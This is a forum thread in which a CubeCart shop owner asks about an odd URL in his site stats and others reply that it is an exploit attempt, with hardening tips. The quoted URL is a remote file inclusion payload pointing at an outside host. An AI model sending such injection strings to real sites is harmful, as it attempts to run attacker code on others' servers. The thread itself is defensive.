Weird Activity On My Site

Guest bhaynes

Guest bhaynes

Can anyone tell me what is happening on my site. I logged in and checked out the stats and viewed who was on my site at that time. The urls that come up are generally where a person is on my site. Well tonight I got something totally odd...I got a URL that was not connected to my site at www.techbydesign.org the url came up as this.

/shop/index.php?screen=http://valhalla360.com/images/help.jpg/crit??

Also I noticed a lot of stat listings have some one at the CART section of the site...and that happens a lot but there are no orders. It goes to a page that says your shopping cart is currently empty. Is this some one up to no good?

Thanks for your help.

Guest bhaynes

It is someone trying to exploit a hack either on your server or on your CubeCart installation. Go through all of the files on your server space and make sure there is nothing there that you dont know about and if you are using an old version of CubeCart then update to 3.0.17.

Ok thank you so much. I am using 3.0.17 currently.

It is someone trying to exploit a hack either on your server or on your CubeCart installation. Go through all of the files on your server space and make sure there is nothing there that you dont know about and if you are using an old version of CubeCart then update to 3.0.17.

Ok thank you so much. I am using 3.0.17 currently.

After you are done tweaking, did you change your CHMOD back to its original & not 777?

You should select a strong password for the "root" account on Windows installations. You should also set up restricted access to root accounts and apply firewall rules to make sure MySQL servers are not exposed to attackers.

I hope this helps.